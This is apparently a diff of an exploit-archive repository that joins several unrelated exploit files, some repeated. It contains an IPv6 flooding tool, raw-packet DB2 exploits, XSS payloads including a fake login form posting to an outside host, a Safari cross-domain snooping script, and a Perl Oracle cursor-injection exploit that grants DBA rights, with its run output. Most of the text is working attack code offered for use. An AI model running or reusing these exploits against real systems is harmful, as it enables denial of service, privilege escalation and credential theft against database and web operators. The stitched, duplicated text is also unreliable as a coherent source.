if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
{
fprintf (stderr, "* inet_pton() failed\n");
exit (EXIT_FAILURE);
}
memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);
lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
if (lnsock == NULL)
{
fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}
inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
printf ("* local ipv6 %s...\n", ip6_buf);
printf ("* attacking %s...", argv[1]);
for (i = 0; i < HAMMER_NUM; i++)
libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
printf ("done\n");
return (EXIT_SUCCESS);
}
// milw0rm.com [2008-02-26]

View file

@ -1,33 +1,33 @@
# Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000))
sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43")
sockobj.close()
# milw0rm.com [2009-04-03]
# Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000))
sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43")
sockobj.close()
# milw0rm.com [2009-04-03]

View file

@ -1,90 +1,90 @@
# Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system
# GUEST account with QQ password shoule be present on target system
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000))
sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18"
"\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB"
"\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E"
)
data=sockobj.recv(102400)
sockobj.send(
"\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03"
"\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E"
"\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2"
"\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1"
"\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00"
"\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1"
"\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3"
"\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0"
"\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00"
"\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11"
"\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8"
"\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85"
"\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2"
"\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1"
)
data=sockobj.recv(102400)
sockobj.send(
"\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC"
"\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13"
"\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01"
"\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53"
"\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C"
"\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E"
"\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00"
"\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30"
"\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14"
"\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44"
"\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00"
"\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54"
"\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E"
"\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28"
"\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21"
"\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00"
"\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00"
"\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1"
)
sockobj.close()
# milw0rm.com [2009-04-03]
# Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system
# GUEST account with QQ password shoule be present on target system
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000))
sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18"
"\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB"
"\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E"
)
data=sockobj.recv(102400)
sockobj.send(
"\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03"
"\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E"
"\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2"
"\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1"
"\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00"
"\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1"
"\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3"
"\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0"
"\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00"
"\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11"
"\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8"
"\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85"
"\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2"
"\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1"
)
data=sockobj.recv(102400)
sockobj.send(
"\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC"
"\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13"
"\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01"
"\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53"
"\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C"
"\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E"
"\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00"
"\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30"
"\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14"
"\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44"
"\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00"
"\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54"
"\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E"
"\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28"
"\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21"
"\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00"
"\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00"
"\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1"
)
sockobj.close()
# milw0rm.com [2009-04-03]

View file

@ -455,6 +455,6 @@ main(int argc, char **argv)
#endif
return 0;
}
// milw0rm.com [2005-04-20]
}
// milw0rm.com [2005-04-20]

View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/23987/info
Multiple personal firewall products are prone to a vulnerability that lets attackers bypass protection mechanisms. This issue occurs because the applications fail to properly implement protection mechanisms based on valid process identifiers.
Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to the memory space of critical processes. This allows attackers to execute arbitrary code with elevated privileges; other attacks are also possible.
The following applications are vulnerable to this issue:
- Comodo Firewall Pro 2.4.18.184
- Comodo Personal Firewall 2.3.6.81
- ZoneAlarm Pro 6.1.744.001
Other applications and versions may also be affected.
http://www.exploit-db.com/sploits/30039-1.zip
http://www.exploit-db.com/sploits/30039-2.zip

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23933/info
TeamSpeak Server is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
TeamSpeak Server 2.0.20.1 is vulnerable; other versions may also be affected.
http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User:<inputtype="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E

View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/24058/info
Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following Tomcat versions are affected:
4.0.0 to 4.0.6
4.1.0 to 4.1.36
5.0.0 to 5.0.30
5.5.0 to 5.5.23
6.0.0 to 6.0.10
http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script>

View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/24121/info
Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions.
Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.
This issue affects Safari 2.0.4; other versions may also be affected.
var snoopWin;
function run() {
snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480');
snoopWin.blur();
setTimeout("snoopy()", 5000);
}
function snoopy() {
alert(snoopWin.location);
setTimeout("snoopy()", 5000);
}

View file

@ -1,140 +1,140 @@
#!/usr/bin/perl
#
# Remote Oracle KUPW$WORKER.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/440439
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70.
# [-] Done!
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86
# ORA-06512: at "SYS.KUPC$QUE_INT", line 912
# ORA-00931: missing identifier
# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910
# ORA-06512: at line 1
# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591
# ORA-06512: at "SYS.KUPW$WORKER", line 13468
# ORA-06512: at "SYS.KUPW$WORKER", line 5810
# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE []
# ORA-06512: at "SYS.KUPW$WORKER", line 1243
# ORA-31626: job does not exist
# ORA-39086: cannot retrieve job information
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END;
# "] at kupw-workerV2.pl line 100.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]
#!/usr/bin/perl
#
# Remote Oracle KUPW$WORKER.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/440439
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70.
# [-] Done!
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86
# ORA-06512: at "SYS.KUPC$QUE_INT", line 912
# ORA-00931: missing identifier
# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910
# ORA-06512: at line 1
# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591
# ORA-06512: at "SYS.KUPW$WORKER", line 13468
# ORA-06512: at "SYS.KUPW$WORKER", line 5810
# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE []
# ORA-06512: at "SYS.KUPW$WORKER", line 1243
# ORA-31626: job does not exist
# ORA-39086: cannot retrieve job information
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END;
# "] at kupw-workerV2.pl line 100.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
